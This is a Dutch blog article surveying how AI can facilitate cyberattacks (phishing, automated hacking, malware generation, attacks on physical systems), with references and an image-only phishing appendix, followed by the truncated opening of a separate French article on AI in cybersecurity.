<p>De meeste publicaties over artificiële ‘intelligentie’ (AI) die handelen over beveiliging en aanval richten zich op de studie van aanvallen op algoritmen voor machine learning (zie bv.&nbsp;<a href="#_ref1">[1]</a>) en verdedigingen tegen dergelijke aanvallen. Traditionele kwaadaardige aanvallen op AI-systemen doen zich bijvoorbeeld voor wanneer een tegenpartij invoergegevens manipuleert om algoritmen voor machine learning te misleiden, wat resulteert in een verkeerde classificatie<a href="#_ftn1" name="_ftnref1"><sup>1</sup></a>.</p>



<p>Desondanks wordt in een aanzienlijk aantal artikelen AI ook onderzocht als een mogelijk wapen tegen informatiesystemen &#8211; waardoor mogelijk snellere, grootschaligere en verdergaande aanvallen mogelijk zijn &#8211; en als een hulpmiddel om bestaande aanvalsvectoren te verbeteren.</p>



<p>In een <a href="/ai-en-cyberbeveiliging/">vorig artikel</a> hebben we kort uitgelegd wat er achter de term ‘artificiële intelligentie’ schuilgaat door enkele basistechnieken te beschrijven die worden gebruikt in cybersecurity. In dit artikel kijken we naar het gebruik van AI om aanvallen op computersystemen te vergemakkelijken. We beschrijven in het bijzonder hoe AI verschillende aanvalsvectoren kan wijzigen of al wijzigt.</p>



<h1 class="wp-block-heading">Pessimistische voorspellingen</h1>



<p>In 2018 merkten Brundage et al.&nbsp;<a href="#_ref2">[2]</a> op dat het toenemende gebruik van AI drie veranderingen in het dreigingslandschap met zich mee zou brengen:</p>



<ul class="wp-block-list">
<li>Een <strong>uitbreiding van bestaande bedreigingen</strong>: AI zou de kosten van aanvallen kunnen verlagen door minder mankracht nodig te hebben, maar ook een breder scala aan potentiële doelwitten kunnen bereiken.</li>



<li><strong>Introductie van nieuwe bedreigingen</strong>: AI-systemen zouden taken kunnen uitvoeren die normaal gesproken onmogelijk zijn voor een mens.</li>



<li>Een <strong>verandering in de typische aard van bedreigingen</strong>: aanvallen die mogelijk worden gemaakt door het gebruik van AI kunnen effectiever, gerichter en moeilijker toe te schrijven</li>
</ul>



<p>Deze voorspellingen worden ondersteund door een recent rapport van het Britse National Cyber Security Centre (NCSC), dat een toename voorspelt in het aantal en de effectiviteit van AI-gebaseerde cybersecuritydreigingen&nbsp;<a href="#_ref3">[3]</a>.</p>



<p>Eenvoudige toegang tot LLM’s zou adversaries bijvoorbeeld in staat kunnen stellen om hun eigen beperkingen op het gebied van middelen, vaardigheden en/of kennis te omzeilen. Bovendien kan ongecontroleerd gebruik van AI-toepassingen in interne projecten of door minder alerte werknemers nieuwe aanvalsoppervlakken creëren en leiden tot het lekken van persoonlijke gegevens, intellectueel eigendom of vertrouwelijke informatie.</p>



<h1 class="wp-block-heading">Phishing en social engineering</h1>



<p>Al in 1966 werd met ELIZA, een van de eerste conversational agents, ontdekt dat mensen door machines kunnen worden misleid&nbsp;<a href="#_ref4">[4]</a>. Natuurlijke taalverwerking is een AI-toepassing waarbij klaartekst de databron is waaruit modellen worden geëxtraheerd<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>. Taalverwerking wordt met succes gebruikt voor vele toepassingen. Het detecteren van ongewenste mails is een voorbeeld, net als het omgekeerde, het omzeilen van spamfilters (bv. <a href="#_ref5">[5]</a>).</p>



<p>Phishing is bijzonder geschikt voor deze laatste benadering, omdat tekstmodellen kunnen worden gebruikt om onderwerpen te identificeren die interessant zijn voor het doelwit en zinnen te genereren waarop het doelwit zou kunnen reageren. In&nbsp;<a href="#_ref6">[6]</a>, bijvoorbeeld, gebruiken de auteurs een Markovmodel en een recurrent neural network om aan te tonen dat het mogelijk is om automatisch berichten te genereren die gebruikt worden in een phishingprocedure op Twitter: de tool leert om het volgende woord te voorspellen op basis van de vorige context in de publicatiegeschiedenis van het doelwit. Elk bericht is dus afgestemd op een bepaald doelwit, waardoor de nauwkeurigheid van de aanval toeneemt.</p>



<p>Gezien het vermogen van <a href="/ai-en-cyberbeveiliging/#LLM">LLM’s</a> om context beter te ‘begrijpen’, en om menselijke tekst beter na te bootsen (soms zelfs met minder fouten&nbsp;<a href="#_ref7">[7]</a><a href="#_ftn3" name="_ftnref3"><sup>3</sup></a>), zien we dat dergelijke tools al worden gebruikt om het schrijven, met de juiste toon, van plausibele mails van collega’s, vrienden, familie of populaire e-commerce sites te vergemakkelijken, mogelijk op basis van informatie uit sociale media&nbsp;<a href="#_ref8">[8]</a> (zie &#8220;<a href="#Bijlage">Bijlage &#8211; Phishingmails genereren</a>&#8220;). Erger nog: het is nu mogelijk om, zonder enige kennis op het gebied van security, ChatGPT te gebruiken om niet alleen phishingmails te genereren, maar ook de bijbehorende website&nbsp;<a href="#_ref9">[9]</a>. Dit is des te verontrustender als je bedenkt dat 94% van de ontdekte kwaadaardige software nog steeds per mail wordt verzonden&nbsp;<a href="#_ref10">[10]</a>.</p>



<p>Een ander voorbeeld van het gebruik van AI om phishingaanvallen te vergemakkelijken is DeepFish&nbsp;<a href="#_ref11">[11]</a>. Deze software produceert nieuwe synthetische phishing webadressen door modellen te leren van de meest effectieve webadressen in historische aanvallen<a href="#_ftn4" name="_ftnref4"><sup>4</sup></a>. Deze adressen kunnen vervolgens worden gebruikt in phishingmails of andere kanalen zoals bijvoorbeeld misleidende advertenties. Kort na de lancering van Bing Chat, voegde Microsoft de mogelijkheid toe om advertenties in conversaties te introduceren. Helaas houden advertenties een inherent risico in en kunnen ze gebruikers ertoe aanzetten om software te downloaden, schadelijke sites te bezoeken en malware te installeren, rechtstreeks vanuit een Bing Chatgesprek <a href="#_ref12">[12]</a>.</p>



<h1 class="wp-block-heading">Automatisch hacken</h1>



<p>AI maakt het mogelijk om aanvallen op machinesnelheid uit te voeren. Deephack&nbsp;<a href="#_ref13">[13]</a> is bijvoorbeeld een softwareagent van een paar honderd regels Python die met behulp van een neuraal netwerk en trial-and-error leert in te breken in webtoepassingen. Het leert om verschillende soorten kwetsbaarheden te misbruiken, wat de deur kan openen naar een groot aantal nieuwe hacksystemen.</p>



<p>DeepLocker<a href="#_ftn5" name="_ftnref5"><sup>5</sup></a> gaat verder door zijn kwaadaardige bedoelingen te verbergen en zichzelf te activeren voor specifieke doelwitten. Om te bepalen of de machine waarop de code van DeepLocker wordt uitgevoerd een doelwit is of niet, gebruikt DeepLocker een complex artificieel neuraal netwerk<a href="#_ftn6" name="_ftnref6"><sup>6</sup></a> in plaats van een eenvoudige lijst met regels. Dit voorkomt dat tools die de software statisch en dynamisch analyseren de aanwezigheid van kwaadaardige code niet kunnen detecteren<a href="#_ftn7" name="_ftnref7"><sup>7</sup></a>. DeepLocker gebruikt ook een ander neuraal netwerk om een sleutel te genereren om het schadelijke deel van zijn code te encrypteren of decrypteren, waardoor het moeilijker te detecteren is.</p>



<p>Bepaalde hackprocedures zouden vereenvoudigd en versneld kunnen worden met behulp van generatieve modellen. Kwaadwillenden zouden bijvoorbeeld tools zoals PentestGPT<a href="#_ftn8" name="_ftnref8"><sup>8</sup></a> kunnen gebruiken. Deze tool kan helpen bij het beheren van verschillende taken in een penetratietestproces, zoals het gebruik van specifieke tools (in het bijzonder het gebruik van commando’s met complexe opties die vaak moeilijk zijn voor een mens) en het suggereren van de te volgen stappen&nbsp;<a href="#_ref14">[14]</a>. Volgens de auteurs kan deze tool zelfs een &#8220;<em>intuïtie</em>&#8221; geven over wat te doen in een bepaald inbraakscenario. We missen hier echter effectieve aanbevelingen voor het zelfstandig uitvoeren van taken. De tool is bovendien niet in staat om een samenhangend begrip van het testscenario te behouden. Maar Fang et al. hebben aangetoond dat agents die worden gevoed door LLM’s zoals ChatGPT zelfstandig over het web kunnen zwerven en onbewaakt buggy webtoepassingen kunnen binnendringen <a href="#_ref15">[15]</a>.</p>



<p>Tot slot zouden generatieve AI-tools, getraind op voldoende grote kwetsbaarhedendatabases, ook kunnen worden gebruikt om codeanalyse te automatiseren en zo uitbuitbare kwetsbaarheden te identificeren, maar de kosten voor het maken van dergelijke modellen zijn hoog.</p>



<h1 class="wp-block-heading">Payload en kwaadaardige code genereren</h1>



<p>Tijdens een cyberaanval is de payload het onderdeel van de aanval dat de schade veroorzaakt (bv. het verwijderen van bestanden). Deze kan aanwezig zijn in een virus of worm, een bijlage of een query die naar een SQL-database wordt gestuurd. Volgens Gupta et al.&nbsp;<a href="#_ref16">[16]</a>, kan een generatieve AI-tool worden gebruikt om payloads te genereren, in sommige gevallen op zulke manier dat ze niet kunnen worden gedetecteerd door een Web Application Firewall (WAF).</p>



<p>Een generatieve AI-tool kan ook worden gebruikt om malware of ransomware te schrijven: Guptal et al. <a href="#_ref16">[16]</a> voerden verschillende tests uit met ChatGPT die ze met name overtuigden om voorbeeldcode te leveren voor verschillende malware zoals NotPetya<a href="#_ftn9" name="_ftnref9"><sup>9</sup></a>, REvil<a href="#_ftn10" name="_ftnref10"><sup>10</sup></a>, Ryuk<a href="#_ftn11" name="_ftnref11"><sup>11</sup></a> en WannaCry<a href="#_ftn12" name="_ftnref12"><sup>12</sup></a>. De resultaten zijn niet direct bruikbaar, maar geven een high-level structuur van de code, die redelijk voor de hand ligt voor wie wel eens geprogrammeerd heeft, maar die de komende jaren tot grote verbeteringen zou kunnen leiden. Vergelijkbare tests zijn ook uitgevoerd, met vergelijkbare resultaten, voor virussen die misbruik maken van kwetsbaarheden zoals Meltdown<a href="#_ftn13" name="_ftnref13"><sup>13</sup></a>, RowHammer<a href="#_ftn14" name="_ftnref14"><sup>14</sup></a> en Spectre<a href="#_ftn15" name="_ftnref15"><sup>15</sup></a>.</p>



<p>Hutchins&nbsp;<a href="#_ref17">[17]</a> heeft echter ernstige twijfels over de mogelijkheid om kwaadaardige software te genereren met behulp van AI, en in het bijzonder met behulp van tools zoals ChatGPT, die zeker niet in staat zijn om volledig functionele software te maken, maar in het beste geval kleine bouwstenen kunnen leveren die moeilijk in elkaar te zetten zijn. Hij wijst er ook op dat deze door AI gegenereerde code al bestaat op het internet.</p>



<h1 class="wp-block-heading">Aanvallen op fysieke systemen</h1>



<p>Tenslotte, als wordt aangenomen dat fysieke systemen (bv. een koelbesturingssysteem) minder veilig zijn dan de IT-infrastructuur en relatief gemakkelijker te misbruiken zijn, dan is het mogelijk om malware te gebruiken om een IT-infrastructuur indirect aan te vallen via het fysieke systeem, waarbij de kwaadaardige acties worden vermomd als toevallige storingen (bv. een gesimuleerde oververhitting die leidt tot een echte noodstop). Dat vertonen Chung et al.&nbsp;<a href="#_ref18">[18]</a>. Hun tool leert automatisch aanvalsstrategieën aan de hand van metingen die door het fysieke systeem zijn verzameld.</p>



<h1 class="wp-block-heading">Analyse van cyberaanvallen die gebruik maken van AI</h1>



<p>Om beveiligingsingenieurs in staat te stellen de classificatie van AI-gebaseerde bedreigingen en hun impact effectief te bestuderen, alsook de strategie van de aanvallers beter te begrijpen, stellen Nektaria et al.&nbsp;<a href="#_ref19">[19]</a> een framework voor om AI-gebaseerde cyberaanvallen te analyseren. Het is gebaseerd op het bestaande en veelgebruikte ‘Cyber Kill Chain’-framework dat is ontwikkeld door Lockheed Martin en bestaat uit drie niveaus:</p>



<ul class="wp-block-list">
<li><strong>Aanvalsfasen en -doelen</strong>: dit eerste niveau wordt gebruikt om te beschrijven wanneer een aanvaller zijn kwaadaardige doelen kan bereiken in functie van de levenscyclus van de cyberaanval. Het vertegenwoordigt de intentie van de aanvaller en het type AI-techniek dat wordt gebruikt om de kwaadaardige acties uit te voeren, afhankelijk van elke fase in de levenscyclus van de cyberaanval.</li>



<li><strong>Impact en classificatie van kwaadaardige AI</strong>: dit tweede niveau is een classificatie op basis van de impact van het kwaadaardige gebruik van AI-technieken, waarbij de potentiële impact wordt weergegeven, afhankelijk van de fase van de toegepaste aanval.</li>



<li><strong>Classificatie van verdedigingsmethoden</strong>: verdediging tegen AI-gebaseerde cyberaanvallen kan niet worden uitgevoerd met een eenvoudige oplossing of een enkele tool. Een diepgaande verdedigingsaanpak is gedurende de hele levenscyclus van cyberaanvallen noodzakelijk om de &#8220;intelligentie&#8221; van de nieuwe methoden te bestrijden.</li>
</ul>



<h1 class="wp-block-heading">Conclusie</h1>



<p>Door de hierboven gegeven voorbeelden lijkt AI vooral een nieuwe ‘productiviteitstool’ voor reeds goed gemotiveerde (al dan niet) professionele aanvallers. De ernstigste dreiging die AI voor security zou kunnen vormen, is de ontdekking op grote schaal van geheel nieuwe aanvalsklassen. Er is echter geen bewijs dat een dergelijke ontdekking waarschijnlijker is dan die van menselijke actoren.</p>



<p>Toch blijven er nog veel vragen over hoe deze geavanceerde bedreigingen kunnen worden voorkomen en beperkt, maar een goede dreigingsanalyse met een geschikt framework is een goed startpunt. Verder geloven we dat een effectieve manier om AI-enabled tegenpartijen te bestrijden ook zal bestaan uit het zelf inzetten van AI competitief te zijn qua bereik, snelheid en schaal. Zoals we in een laatste artikel over dit onderwerp zullen zien, zou AI inderdaad kunnen helpen bij het automatiseren van cyberverdedigingstaken zoals vulnerability assessment, intrusion detection, incident response en threat intelligence processing.</p>



<h1 class="wp-block-heading">Referenties</h1>



<p><a name="_ref1"></a>[1]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Papernot, P. McDaniel, S. Jha, M. Fredrikson, Z. B. Celik, en A. Swami, ‘The limitations of deep learning in adversarial settings’. arXiv, 23 november 2015. Geraadpleegd: 27 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/1511.07528" target="_blank" rel="noopener">http://arxiv.org/abs/1511.07528</a></p>



<p><a name="_ref2"></a>[2]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Brundage <em>e.a.</em>, ‘The malicious use of artificial intelligence: forecasting, prevention and mitigation’, feb. 2018.</p>



<p><a name="_ref3"></a>[3]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ‘The near-term impact of AI on the cyber threat’, National Cyber Security Centre, jan. 2024. Geraadpleegd: 27 januari 2024. [Online]. Beschikbaar op: <a href="https://www.ncsc.gov.uk/pdfs/report/impact-of-ai-on-cyber-threat.pdf" target="_blank" rel="noopener">https://www.ncsc.gov.uk/pdfs/report/impact-of-ai-on-cyber-threat.pdf</a></p>



<p><a name="_ref4"></a>[4]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Weizenbaum, ‘ELIZA—a computer program for the study of natural language communication between man and machine’, <em>Commun. ACM</em>, vol. 9, nr. 1, pp. 36-45, jan. 1966, doi: <a href="https://doi.org/10.1145/365153.365168" target="_blank" rel="noopener">https://doi.org/10.1145/365153.365168</a>.</p>



<p><a name="_ref5"></a>[5]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S. Palka en D. McCoy, ‘Fuzzing e-mail filters with generative grammars and n-gram analysis’, in <em>WOOT’15: Proceedings of the 9th USENIX Conference on Offensive Technologies</em>, aug. 2015.</p>



<p><a name="_ref6"></a>[6]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Seymour en P. Tully, ‘Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter’, gepresenteerd bij Black Hat USA, 2016, pp. 1-8.</p>



<p><a name="_ref7"></a>[7]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Heikkilä, ‘How to spot AI-generated text’, MIT Technology Review. Geraadpleegd: 11 oktober 2023. [Online]. Beschikbaar op: <a href="https://www.technologyreview.com/2022/12/19/1065596/how-to-spot-ai-generated-text/" target="_blank" rel="noopener">https://www.technologyreview.com/2022/12/19/1065596/how-to-spot-ai-generated-text/</a></p>



<p><a name="_ref8"></a>[8]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Chapman, ‘Phishing threat trends report &#8211; From pretexting to payloads, how have phishing attacks evolved in 2023?’, egress, okt. 2023. Geraadpleegd: 7 november 2023. [Online]. Beschikbaar op: <a href="https://www.egress.com/media/mq4kwitu/egress_phishing_threat_trends_report.pdf" target="_blank" rel="noopener">https://www.egress.com/media/mq4kwitu/egress_phishing_threat_trends_report.pdf</a></p>



<p><a name="_ref9"></a>[9]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S. S. Roy, K. V. Naragam, en S. Nilizadeh, ‘Generating phishing attacks using ChatGPT’. arXiv, 8 mei 2023. Geraadpleegd: 17 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2305.05133" target="_blank" rel="noopener">http://arxiv.org/abs/2305.05133</a></p>



<p><a name="_ref10"></a>[10]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ‘Preparing for AI-enabled cyberattacks’, MIT Technology Review, jan. 2021.</p>



<p><a name="_ref11"></a>[11]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Correa Bahnsen, ‘DeepPhish: Simulating malicious AI’, 6 december 2018.</p>



<p><a name="_ref12"></a>[12]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Segura, ‘Malicious ad served inside Bing’s AI chatbot’, Malwarebytes. Geraadpleegd: 7 november 2023. [Online]. Beschikbaar op: <a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot" target="_blank" rel="noopener">https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot</a></p>



<p><a name="_ref13"></a>[13]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; D. Petro en B. Morris, ‘Weaponizing machine learning: Humanity was overrated anyway’, gepresenteerd bij DEF CON 25, 10 augustus 2017. [Online]. Beschikbaar op: <a href="https://www.youtube.com/watch?v=wbRx18VZlYA" target="_blank" rel="noopener">https://www.youtube.com/watch?v=wbRx18VZlYA</a></p>



<p><a name="_ref14"></a>[14]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Deng <em>e.a.</em>, ‘PentestGPT: An LLM-empowered automatic penetration testing tool’. arXiv, 13 augustus 2023. Geraadpleegd: 8 november 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2308.06782" target="_blank" rel="noopener">http://arxiv.org/abs/2308.06782</a></p>



<p><a name="_ref15"></a>[15]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; R. Fang, R. Bindu, A. Gupta, Q. Zhan, en D. Kang, ‘LLM Agents can Autonomously Hack Websites’. arXiv, 6 februari 2024. Geraadpleegd: 19 februari 2024. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2402.06664" target="_blank" rel="noopener">http://arxiv.org/abs/2402.06664</a></p>



<p><a name="_ref16"></a>[16]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Gupta, C. Akiri, K. Aryal, E. Parker, en L. Praharaj, ‘From ChatGPT to ThreatGPT: Impact of generative AI in cybersecurity and privacy’, <em>IEEE Access</em>, vol. 11, pp. 80218-80245, aug. 2023, doi: <a href="https://doi.org/10.1109/ACCESS.2023.3300381" target="_blank" rel="noopener">10.1109/ACCESS.2023.3300381</a>.</p>



<p><a name="_ref17"></a>[17]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Hutchins, ‘A realistic look at implications of ChatGPT for cybercrime’, MalwareTech. Geraadpleegd: 6 februari 2024. [Online]. Beschikbaar op: https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html</p>



<p><a name="_ref18"></a>[18]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Chung, Z. T. Kalbarczyk, en R. K. Iyer, ‘Availability attacks on computing systems through alteration of environmental control: smart malware approach’, in <em>Proceedings of the 10th ACM/IEEE International Conference on Cyber-Physical Systems</em>, Montreal Quebec Canada: ACM, apr. 2019, pp. 1-12. doi: <a href="https://doi.org/10.1145/3302509.3311041" target="_blank" rel="noopener">10.1145/3302509.3311041</a>.</p>



<p><a name="_ref19"></a>[19]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Kaloudi en J. Li, ‘The AI-based cyber threat landscape: A survey’, <em>ACM Comput. Surv.</em>, vol. 53, nr. 1, pp. 1-34, feb. 2020, doi: <a href="https://dl.acm.org/doi/abs/10.1145/3372823" target="_blank" rel="noopener">https://dl.acm.org/doi/abs/10.1145/3372823</a>.</p>



<h1 class="wp-block-heading"><a id="Bijlage"></a>Bijlage &#8211; Phishingmails genereren</h1>



<p>Hier volgen enkele voorbeelden van hoe je phishingmails kunt genereren met ChatGPT (gegenereerd met versie 4.0 op 9 februari 2024):</p>



<p><a href="/wp-content/uploads/2024/02/ChatGPT-sample-1-NL.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20012" src="/wp-content/uploads/2024/02/ChatGPT-sample-1-NL.png" alt="" width="600" height="993"></a> <a href="/wp-content/uploads/2024/02/ChatGPT-sample-2-NL.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20014" src="/wp-content/uploads/2024/02/ChatGPT-sample-2-NL.png" alt="" width="600" height="993"></a> <a href="/wp-content/uploads/2024/02/ChatGPT-sample-3-NL.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20016" src="/wp-content/uploads/2024/02/ChatGPT-sample-3-NL.png" alt="" width="600" height="993"></a></p>



<h1 class="wp-block-heading">Voetnoten</h1>



<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a>&nbsp;&nbsp; De ATLAS knowledge base van MITRE (<a href="https://atlas.mitre.org/" target="_blank" rel="noopener">https://atlas.mitre.org/</a>) identificeert een aanzienlijk aantal kwetsbaarheden in AI-gebaseerde systemen. Het gebruik van AI vergroot het aanvalsoppervlak van bestaande systemen.</p>



<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a> &nbsp; Tegenwoordig zijn dergelijke modellen in staat om Wikipedia in zijn geheel te onthouden. Wikipedia is het resultaat van het cumulatieve werk van talloze vrijwilligers en experts in hun respectieve vakgebieden, over een groot aantal uiteenlopende onderwerpen.</p>



<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a> &nbsp; Wie heeft er nog nooit een phishingmail ontvangen vol spel- of grammaticafouten, waardoor hij gemakkelijk te herkennen is?</p>



<p><a href="#_ftnref4" name="_ftn4"><sup>4</sup></a> &nbsp; De meest gebruikte payload voor phishing mails zijn webadressen, volgens een recent rapport van egress&nbsp;<a href="#_ref8">[8]</a>.</p>



<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a> &nbsp; <a href="https://www.blackhat.com/us-18/briefings/schedule/#deeplocker----verbergen-gerichte-aanvallen-met-ai-locksmithing-11549" target="_blank" rel="noopener">https://www.blackhat.com/us-18/briefings/schedule/#deeplocker&#8212;concealing-targeted-attacks-with-ai-locksmithing-11549</a></p>



<p><a href="#_ftnref6" name="_ftn6"><sup>6</sup></a>&nbsp;&nbsp; Een voorbeeld dat wordt gegeven door de auteurs van DeepLocker is het gebruik van gezichtsherkenning van de gebruiker om specifieke individuen aan te vallen. De keuze voor het uitvoeren van kwaadaardige code zou ook gekoppeld kunnen worden aan het gedrag van de gebruiker, de softwareomgeving, enz.</p>



<p><a href="#_ftnref7" name="_ftn7"><sup>7</sup></a> &nbsp; In sommige opzichten is het voorbeeld vergelijkbaar met de auto’s van Volkswagen Group die hun gedrag veranderden tijdens goedkeuringscycli en waarvan het schandaal in 2015 aan het licht kwam.</p>



<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a> <a href="https://github.com/GreyDGL/PentestGPT" target="_blank" rel="noopener">https://github.com/GreyDGL/PentestGPT</a></p>



<p><a href="#_ftnref9" name="_ftn9"><sup>9</sup></a> &nbsp; <a href="https://en.wikipedia.org/wiki/2017_Ukraine_ransomware_attacks" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/2017_Ukraine_ransomware_attacks</a></p>



<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> <a href="https://en.wikipedia.org/wiki/REvil" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/REvil</a></p>



<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> <a href="https://en.wikipedia.org/wiki/Ryuk_(ransomware)" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Ryuk_(ransomware)</a></p>



<p><a href="#_ftnref12" name="_ftn12"><sup>12</sup></a> <a href="https://nl.wikipedia.org/wiki/WannaCry" target="_blank" rel="noopener">https://nl.wikipedia.org/wiki/WannaCry</a></p>



<p><a href="#_ftnref13" name="_ftn13"><sup>13</sup></a> <a href="https://nl.wikipedia.org/wiki/Meltdown_(veiligheidslek)" target="_blank" rel="noopener">https://nl.wikipedia.org/wiki/Meltdown_(veiligheidslek)</a></p>



<p><a href="#_ftnref14" name="_ftn14"><sup>14</sup></a> <a href="https://en.wikipedia.org/wiki/Row_hammer" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Row_hammer</a></p>



<p><a href="#_ftnref15" name="_ftn15"><sup>15</sup></a> <a href="https://nl.wikipedia.org/wiki/Spectre_(veiligheidslek)" target="_blank" rel="noopener">https://nl.wikipedia.org/wiki/Spectre_(veiligheidslek)</a></p>



<p>_________________________<br><em>Dit is een ingezonden bijdrage van Fabien A. P. Petitcolas, IT-beveiligingsspecialist bij Smals Research. Dit artikel werd geschreven in eigen naam en neemt geen standpunt in namens Smals.</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>L’IA en cybersécurité</title>
		<link>https://www.smalsresearch.be/lia-en-cybersecurite/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Wed, 20 Dec 2023 07:00:00 +0000</pubDate>
				<category><![CDATA[[FR]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=19660</guid>

					<description><![CDATA[Dans cet article nous décrivons brièvement différentes techniques « d’intelligence artificielle » utilisées en cybersécurité.]]></description>
										<content:encoded><![CDATA[
<p><a href="/ai-en-cyberbeveiliging/"><em>Nederlandstalige versie</em></a></p>



<p>L’évolution phénoménale des techniques d’apprentissage automatique («&nbsp;<em>machine learning (ML)</em>&nbsp;») et, plus généralement «&nbsp;d’intelligence&nbsp;» artificielle (IA)&nbsp;<a href="#ref1">[1]</a>, semble avoir atteint son acmé au cours des dernières années avec l’arrivée en force de l’IA générative («&nbsp;<em>Generative AI (GenAI)</em>&nbsp;») et l’emblématique «&nbsp;ChatGPT<a href="#_ftn1" name="_ftnref1"><sup>1</sup></a>. » Nonobstant les nombreuses limites de ces techniques et les risques qu’elles posent <a href="#ref2">[2]</a>,&nbsp;<a href="#ref3">[3]</a>, il existe des applications positives dans de nombreux domaines (p. ex. moteurs de recherche,&nbsp; traduction automatique, annotation automatique d’images, etc.), et l’on peut se demander quel pourrait-être l’apport de ces techniques en cybersécurité.</p>



<p>En fait, les experts en cybersécurité n’ont pas attendu la venue de l’IA générative pour utiliser des techniques d’IA. Mais dans le domaine de la cybersécurité, comme c’est souvent le cas avec d’autres techniques, l’application de l’IA est souvent considérée comme une arme à double tranchant dans la mesure où elle peut être utilisée pour l’attaque aussi bien que pour la défense&nbsp;: d’un côté l’IA permet de mettre au point des attaques de plus en plus sophistiquées, et de l’autre, d’apporter des réponses plus efficaces aux attaques, comme l’amélioration de la détection de menaces et d’anomalies et le soutien opérationnel des analystes en sécurité <a href="#ref4">[4]</a>.</p>



<p>L’introduction d’attaques informatiques aidées par l’IA pourrait même ouvrir, selon&nbsp;Renault et al.&nbsp;<a href="#ref5">[5]</a>, une nouvelle ère dans la course sécuritaire avec des transformations connues et inconnues des vecteurs d’attaques. Mais bien qu’il ne fasse aucun doute que les adversaires utiliseront ou ont commencé à utiliser l’IA générative, afin de créer des courriels d’hameçonnage plus réalistes et efficaces ou encore pour se faire passer pour d’autres utilisateurs, il n’est pas du tout évident qu’ils pourront utiliser l’IA générative pour lancer des attaques plus sophistiquées ou même créer de nouvelles classes d’attaques.</p>



<p>Quoi qu’il en soit, malgré des améliorations possibles, la prolifération d’annonces concernant l’IA dans le domaine de la cybersécurité (par exemple Crowdstrike<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>, Google<sup><a href="#_ftn3" name="_ftnref3">3</a></sup>, Microsoft<sup><a href="#_ftn4" name="_ftnref4">4</a></sup>, et SentinelOne<sup><a href="#_ftn5" name="_ftnref5">5</a></sup> ont récemment annoncé l’emploi d’IA générative dans leurs produits de sécurité) pourrait conduire à de fortes déceptions. Ces déceptions pourraient être accentuées par le fait que la performance ou la précision des systèmes de cybersécurité n’est pas normalisée dans son ensemble, ce qui rend difficile la comparaison de différents systèmes et soulève des questions comme&nbsp;: «&nbsp;<em>Quelle est la meilleure façon d</em><em>’</em><em>évaluer, de configurer ou de comparer différents systèmes de cybersécurité&nbsp;?</em>&nbsp;» ou «&nbsp;<em>Disposons-nous d</em><em>’</em><em>une méthodologie universelle pour évaluer la robustesse et la performance dans tous les scénarios ou dans des scénarios différents&nbsp;?</em>&nbsp;»&nbsp;<a href="#ref6">[6]</a> ou encore «&nbsp;Un système performant sur les données du fabriquant, le sera-t-il autant sur mes propres données&nbsp;?&nbsp;» Plus prosaïquement, que se cache-t-il réellement derrière le terme d’intelligence artificielle, lorsqu’il est adossé à des produits de cybersécurité&nbsp;?</p>



<p>La réponse à cette dernière question est loin d’être évidente étant donné le nombre important de techniques très différentes entrant dans le domaine de l’IA. Dans la suite de cet article nous décrivons brièvement ce qui se cache derrière le terme «&nbsp;d’intelligence artificielle&nbsp;» en décrivant quelques techniques de base utilisées en cybersécurité. Dans les articles suivants nous passerons en revue l’utilisation possible de ces techniques pour l’attaque comme pour la défense dans le contexte de la cybersécurité.</p>



<h1 class="wp-block-heading">Principales techniques d’apprentissage automatique</h1>



